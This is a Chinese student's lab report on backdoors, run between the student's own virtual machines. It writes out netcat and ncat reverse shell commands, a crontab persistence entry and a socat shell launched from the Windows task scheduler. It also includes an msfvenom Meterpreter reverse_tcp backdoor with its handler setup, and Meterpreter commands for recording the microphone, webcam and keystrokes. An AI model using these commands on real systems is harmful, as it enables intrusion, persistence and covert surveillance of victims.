2018-2019-2 网络对抗技术 20165220 Exp2 后门原理与实践

实验内容

1.使用netcat获取主机操作Shell，cron启动
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
5.使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

基础问答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

• 电子邮件进入，捆绑软件绑定

(2)例举你知道的后门如何启动起来(win及linux)的方式？

• 修改注册表，添加自启动、设置为开机自启动等等

(3)Meterpreter有哪些给你映像深刻的功能？

• 摄像头入侵

(4)如何发现自己有系统有没有被安装后门？

• 安装专门的杀毒软件，定期检测电脑安全情况；开机自启动项中是否有可疑程序等。

Windows获得Linux Shell

1.查看本机的ip

 

2.windows打开监听：

ncat.exe -l -p 5220

Linux反弹连接win：

nc 192.168.1.101 5220 -e /bin/sh

Linux获得Win Shell

3.查看本机IP

4.Linux运行监听指令，输入命令

nc -l -p 5220

5.Windows反弹连接Linux，在ncat目录下输入命令

ncat.exe -e cmd.exe 192.168.181.129 5220

6.在Linux shell下使用dir命令。

 

在Linux与Windows之间进行数据传送

Windows下监听端口

ncat.exe -l -p 5220

Linux下连接到Windows的端口

ncat 192.168.137.1 5220

数据传输

 

使用socat获取主机操作Shell, 任务计划启动

Windows中使用

ncat.exe -l 5220

在linux中，使用

crontab -e

指令编辑一条定时任务，选择编辑器时选择3，在底行插入

38 * * * * /bin/netcat 192.168.137.1 5220 -e /bin/sh

保存退出配置即生效，在系统时间到38分钟，就会在Windows中监听的cmd中发现获得了Linux shell

win7系统中鼠标右击计算机：计算机管理->系统工具->任务计划程序->创建任务

常规中填写任务名称如：20165220

.导入socat.exe的路径，并添加参数：

tcp-listen:5220 exec:cmd.exe,pty,stderr

创建完成之后，，按Windows+L快捷键锁定计算机，再次打开，运行之前创建的任务。

在Linux shell中输入

socat - tcp:192.168.137.1:5220

使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

.在kali中输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.181.129 LPORT=5220 -f exe > 20165220_backdoor.exe

生成后门程序，传输成功并且在Windows的ncat文件夹下查看后门程序。

再打开新的shell，并且使用msfconsole进入msf控制台：

5.输入use exploit/multi/handler：
6.使用和生成后门程序时相同的payload：set payload windows/meterpreter/reverse_tcp：
7.设置ip：set LHOST 192.168.181.129
9.设置端口：set LPORT 5220
10.使用exploit开始监听
11.在Windows cmd 中相应文件夹中执行：20165220_backdoor.exe，Linux获得Windows主机的连接，并且得到了远程控制的shell：

使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

使用record_mic可以截获一段音频：

使用webcam_snap可以使用摄像头拍照

使用creenshot可以进行截屏：

使用keyscan_start 记录下击键的过程，使用keyscan_dump读取击键的记录：

实验中遇到的问题

vm虚拟机与主机ping不通。

解决办法：

打开VMware的虚拟网卡

VMware的虚拟网卡的配置程序在电脑上叫：虚拟网络编辑器，一般在开始菜单就能找到，没有的话可以去VMware的安装目录找。

1. 我们把它打开，点击【更改设置】。

2. 选择 VMnet8 NAT模式。（PS:不出意外的话，你会看到3个模式：VMnet0——桥接模式，VMnet1——自定义，VMnet8——NAT模式，这里的模式对应你的虚拟机的联网模式，你的虚拟机是什么模式，就选什么模式如果有多台虚拟机而且联网模式也不一样，那么就都选择并配置一下，一般默认选择NAT模式，请根据自己的虚拟机联网模式选择）

3. 勾选【将主机虚拟适配器连接到此网络(V)】项；并点击【应用】和【确定】。

基本到这一步，问题就已经解决了。

实验总结与体会

我首先明白了什么是后门。（后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法）然后发现了以后一定要注意安全防范问题，一定要加强安全意识！